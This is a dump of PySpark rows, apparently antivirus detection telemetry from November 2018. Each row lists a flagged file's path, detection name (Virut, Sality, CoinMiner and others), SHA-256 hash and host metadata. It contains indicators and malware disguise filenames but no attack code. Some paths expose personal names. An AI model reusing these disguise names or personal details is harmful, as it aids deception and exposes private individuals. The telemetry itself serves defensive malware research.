  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ebc3c31328d3e062a4cae121b7ff8441a9beefe61fefaddd01a462789bb5fcb4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:52:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='form tugas guru sasaran titin luciana.exe', filepath='F:\\\xa0\\FORM TUGAS GURU SASARAN TITIN LUCIANA\\FORM TUGAS GURU SASARAN TITIN LUCIANA.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T02:30:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=2880000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='990a6632dd4801c8831ff3a0bf6bdc7ceadc00075094e28ce3dfbafa1eb9cf80', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T21:53:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='alondra                                   .scr', filepath='E:\\Alondra                                   .scr', filesize=64000, name='W32/Sality.K.#M1.#R1'), hash='e562a79153316650e911a59240cf1949e94b5b45d5e72143edefd294716ab455', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='perico maria teresa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 573160\\PERICO MARIA TERESA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maphwdygbinotm.bat', filepath='E:\\maphwdygbinotm.bat', filesize=512000, name='TR/Taranis.2886.#M0.#R0'), hash='eeb30022f7c3503064471543d222174092dacb7e964ee1ea21f0c4fe8a60e3ec', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T03:29:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181105-064856-4a1513d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_aa9e90a7\\AVSCAN-20181105-064843-47445544\\AVSCAN-20181105-064856-4A1513D3', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:48:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150854-af4069ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150854-AF4069AE', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:08:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T03:52:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:18:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cloudbackup5892.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\CloudBackup5892.exe', filesize=5600000, name='PUA/MyPCBackup.Gen.#M300.#R5908'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline=None, country='MQ', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T02:42:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='strixdrv.nsx', filepath='\\\\?\\F:\\kompyuter progr\\game\\Lineage II Rampage\\system\\strixdrv.nsx', filesize=6976000, name='HEUR/APC.#M1.#R1'), hash='aa9d553fa80595a6b9e7b4e98d241133674707db09d1b610b2386490aa7813d9', metadata=Row(cmdline=None, country='UZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:02:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe181_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe181 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T07:59:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='msodru.exe', filepath='\\\\?\\C:\\ProgramData\\msodru.exe', filesize=96272000, name='TR/Taranis.2633.#M1.#R1'), hash='7a326cbfc5f5311474de48a314dc873821cc6d344ef506bbf2211de17de7a85c', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:21:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-155125-d01f3427', filepath='C:\\ProgramData\\Avira\\AntiVir Desktop\\TEMP\\AvGuardIA_6bb2b461\\AVSCAN-20181104-154942-C4D2A19E\\AVSCAN-20181104-155125-D01F3427', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='2ffa0baef8f7fe1c15fddfbf27e2355e9ead317e07726d0bc12cd7bbfaf5eb6e', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ec46', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ec46', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='unrar.exe', filepath='\\\\?\\D:\\العاب\\GTA 20\\commandos 1\\RZRCMTRN\\UNRAR.EXE', filesize=192000, name='W32/Sality.AT.#M1.#R1'), hash='99c91bc43a55b842ad7e1c908b6ca0b19e2a626aecb72b578e763b86caba178d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T10:04:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsj7252.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/abm \\\\\\/abmmode=idle', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\AVG PC TuneUp\\tuscanx.exe', parentsize=2670944, timestamp='2018-11-04T12:48:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-221723-32b0f04e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6931b99d\\AVSCAN-20181104-221652-2BB38B21\\AVSCAN-20181104-221723-32B0F04E', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:17:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='9efcb170c89b7575c13953719263eff6f74be1ffb30c6f047e917ec5793ccfc9', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\SoftwareUpdater\\AviraSoftwareUpdaterToastNotificationsBridge.exe', parentsize=103880, timestamp='2018-11-04T14:07:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T16:13:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows\\Temp\\nsd1B8A.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=18594760, timestamp='2018-11-04T12:55:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-131106-16901a6d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-131106-16901A6D', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:11:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-17-10-39.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:40:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-04T00:44:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-170648-59779150', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ec7aee53\\AVSCAN-20181104-170624-552EB310\\AVSCAN-20181104-170648-59779150', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M1.#R1'), hash='5f28ee2b6f85211912fd7283bc72088a22b75457293cfa31a4b3428ac82f35a4', metadata=Row(cmdline=None, country='BA', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T16:03:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='peacesa.com', filepath='C:\\Users\\X\\Desktop\\6000 Virus Collection IrFan_1933 or XyberDexstop\\() --- ()\\DANGEROUS (Fvck1933)\\PEACESA.COM', filesize=8000, name='Peace #2.#M1.#R1'), hash='12f6e920b0c478b053fc71e4805b4f930154f3a65d134d029c827fd991e0f6b8', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:45:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wuauclt.exe', filepath='C:\\Windows\\System32\\wuauclt.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='a3f9ab0c635a33655bba901c055526b8745b86fab8b1dcafd7b343464bfce157', metadata=Row(cmdline='-k netsvcs', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T06:33:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0003378.exe', filepath='f:\\system volume information\\_restore{c479216e-5d38-4428-b4db-e28930c85d49}\\rp8\\A0003378.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='1ecffd8bca3266e27ceae6636f113c5af8590e613a536e2a6943ce1fbf5f286f', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:28:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T12:35:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='disableusbwin7.exe', filepath='\\\\10.255.111.86\\d$\\12.Hiren.s.Boot.CD.15.2\\HBCD\\Programs\\DisableUSBWin7.exe', filesize=64000, name='TR/Siggen.cucmw.#M1.#R1'), hash='db6f79265933c5ec30247d757b221f8d5694e189970243bede519902113fc960', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T06:22:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ewogxhf.exe', filepath='\\\\?\\E:\\PASTOR ELOY GARCIA C\\AppData\\Local\\ewogxhf.exe', filesize=3072000, name='ADWARE/Lollipop.Gen4.#M300.#R300075'), hash='0d299e2f10838d95aea903ad8570e2add8321f78d88f18987c01407de7f8861b', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:02:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cnab4mnu.exe', filepath='D:\\program\\2016\\2900\\English\\CNAB4MNU.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='a5ef8ff89ee33a80c326ff4fb0911ab60e5e34c592f95f91354addeaef20fef8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T17:51:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='obfpmxtbmp.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\obfpmxtbmp.exe', filesize=75776000, name='WORM/Lodbak.Gen4.#M300.#R300556'), hash='30f8921b830c23bb51450af865dbeb4f4f62509c857a6cab1482c649953f5134', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='samsung_sm-a730n_en.htm', filepath='C:\\Program Files (x86)\\Octoplus\\Octoplus_Samsung\\Manuals\\Samsung_SM-A730N_EN.htm', filesize=384000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='bc4f3902ca6b6cf68b3d38c59e5e76d835c8f5a2eec88500b5dbcc97d7221e90', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=677024, timestamp='2018-11-04T20:01:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filepath='C:\\Users\\X\\AppData\\Roaming\\Apple Computer\\MobileSync\\Backup\\7ae31f6cc9795fd2a07cdede1da8b3c615ad2198\\Snapshot\\0c\\0c08bca7a4b89869bfad60fbe70a1a6b319a2f21', filesize=8000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline='--pipe \\\\\\\\\\\\\\\\.\\\\\\\\pipe\\\\\\\\30700595-2017301328418480', country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Common Files\\Apple\\Mobile Device Support\\AppleMobileBackup.exe', parentsize=67896, timestamp='2018-11-04T11:50:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='C:\\Users\\X\\Downloads\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-04T23:44:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T05:07:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dccw.exe', filepath='E:\\Windows\\System32\\dccw.exe', filesize=896000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='1148c9091e120f00e686b6e47097c37786b865d5ed4ea6c7bdcd82f036f1869e', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T11:04:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:06:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='posteriza_install-downloader.exe', filepath='\\\\DATENSERVER\\Daten\\DR-ACER-HOME-Joerg\\latest\\DRIVEE\\Downloads\\posteriza_install-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='47333a5fff555669fc1839f69f5e866732216ec9e3f332b2c218194ce682aa04', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T11:01:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='saveeditor.exe', filepath='G:\\العاب شبكه\\need for speed most wanted on\\SaveEditor.exe', filesize=192000, name='W32/Ramnit.CD.#M1.#R1'), hash='2e5aad637256e5c8af22c9b061b9e1ba12cb71f9fbb709b626d01b17ccc443c4', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\360\\Total Security\\safemon\\QHActiveDefense.exe', parentsize=965184, timestamp='2018-11-04T11:36:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-174758-cd50bf96', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2a8ca4a0\\AVSCAN-20181104-173917-96D058EB\\AVSCAN-20181104-174758-CD50BF96', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T16:48:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='openoffice 4.1.3 (fr) installation files.exe', filepath='G:\\OpenOffice 4.1.3 (fr) Installation Files.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline='rtp', country='SN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1866864, timestamp='2018-11-04T17:13:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsb7494.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Fotor_Rus_Setup.exe', parentsize=268416568, timestamp='2018-11-04T08:46:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Windows\\winsxs\\x86_microsoft-windows-mediaplayer-core_31bf3856ad364e35_6.1.7601.18840_none_0d4cab08ad77d22d\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='98a29e5b8f66488b09de36a0f5da4c771a129a61a4494cfa1234981e19011f73', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T02:28:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='cheats love 64 bit.exe', filepath='c:\\users\\X\\appdata\\local\\temp\\rar$exa8628.3847\\love cheats\\cheats love 64 bit.exe', filesize=3968000, name='SPR/CheatEngine.964b87.#M1.#R1'), hash='964b876090eec78f5a6ff3d259e5d2393ba7c305853fe7c20cb4d554305513c1', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=2266328, timestamp='2018-11-04T13:52:28Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-165142-5f9a64b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c1cda043\\AVSCAN-20181104-165102-59D99D76\\AVSCAN-20181104-165142-5F9A64B0', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T15:51:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120000-0263910c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9a890420\\AVSCAN-20181104-115944-FF0EF3BE\\AVSCAN-20181104-120000-0263910C', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T04:00:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181101-195417-a634618d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-195345-A1657267\\AVSCAN-20181101-195417-A634618D', filesize=64000, name='TR/Rogue.64000.#M1.#R1'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:33:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsb4964.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:01:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-201416-b7811cf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_40bae418\\AVSCAN-20181102-200324-7357C59E\\AVSCAN-20181102-201416-B7811CF7', filesize=892000, name='ADWARE/Spigot.892000.#M1.#R1'), hash='9559dc925a2a572eeeff7b5d42e1aabe49cc80f1b149b4d09d9acd8e801ff827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T12:08:32Z'), dt=datetime.date(2018, 11, 2)),
